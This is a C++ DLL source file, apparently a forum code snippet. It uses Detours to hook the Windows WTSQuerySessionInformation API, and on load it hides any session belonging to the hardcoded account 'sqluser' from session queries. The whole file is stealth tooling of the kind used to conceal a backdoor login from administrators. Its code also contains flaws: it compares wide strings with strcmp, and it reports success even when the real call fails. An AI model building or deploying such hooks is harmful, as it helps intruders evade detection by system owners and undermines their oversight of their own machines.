[C++] 纯文本查看 复制代码 // dllmain.cpp
#include "stdafx.h"
#include "detours.h"
#pragma comment(lib, "detours.lib")
static TCHAR gUserName[128];
static int gLen;
static BOOL(WINAPI* TrueWTSQuerySessionInformation)(
__in HANDLE hServer,
__in DWORD SessionId,
__in WTS_INFO_CLASS WTSInfoClass,
__out LPTSTR * ppBuffer,
__out DWORD * pBytesReturned
) = WTSQuerySessionInformation;
BOOL WINAPI HookWTSQuerySessionInformation(
__in HANDLE hServer,
__in DWORD SessionId,
__in WTS_INFO_CLASS WTSInfoClass,
__out LPTSTR * ppBuffer,
__out DWORD * pBytesReturned
)
{
TrueWTSQuerySessionInformation(hServer, SessionId, WTSInfoClass, ppBuffer, pBytesReturned);
if (strcmp((char*)*ppBuffer, (char*)gUserName) == 0) {
*ppBuffer = NULL;
*pBytesReturned = 0;
}
return TRUE;
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
ZeroMemory(gUserName, 128 * 2);
HideUserSession(L"sqluser", sizeof(L"sqluser"));
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern "C" _declspec(dllexport) bool HideUserSession(TCHAR* wcsUserName, int iLen)
{
CopyMemory(gUserName, wcsUserName, iLen);
gLen = iLen;
DetourRestoreAfterWith();
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)TrueWTSQuerySessionInformation, HookWTSQuerySessionInformation);
LONG error = DetourTransactionCommit();
if (error == NO_ERROR) {
return true;
}
else {
return false;
}
}
|